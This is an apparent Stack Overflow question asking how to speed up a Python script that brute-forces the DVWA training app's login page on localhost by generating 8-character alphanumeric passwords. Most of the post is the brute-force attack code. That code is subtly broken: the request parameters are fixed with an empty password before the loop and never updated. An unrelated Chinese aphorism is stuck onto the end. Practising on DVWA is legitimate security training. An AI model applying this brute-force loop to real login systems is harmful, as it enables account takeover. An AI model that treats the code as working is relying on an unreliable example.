My Python script brute forces in DVWA (Damn Vunerable Web App), it has to brute-force an 8 digit password but without using a word list. It has to generate the passwords and test them on the fly for the following:
- Ascii_uppercase
- Ascii_lowercase
- Digits
It works, but it takes long. The password is "password" but I have to prove it using this script. How to make this script run faster? I'm assuming I have to use threads. The code that generates and tests the passwords:
passwd = ''
####### Parameter information used for GET Requests #######
params = (
('username', 'admin'),
('password', passwd),
('Login', 'Login'),
)
password_length = 8
for combo in product(string.ascii_lowercase + string.ascii_uppercase + string.digits, repeat=password_length):
passwd = ''.join(combo)
r = requests.get('http://127.0.0.1/dvwa/vulnerabilities/brute/', headers=headers, params=params, cookies=cookies, verify=False)
print(''.join(combo))
if 'Username and/or password incorrect.' in r.text:
print('Crack failure')
else:
print("Crack Success")
print("Password is: " + passwd)
sys.exit()
question from:
https://stackoverflow.com/questions/65888829/how-to-make-this-brute-forcing-dvwa-script-faster 与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
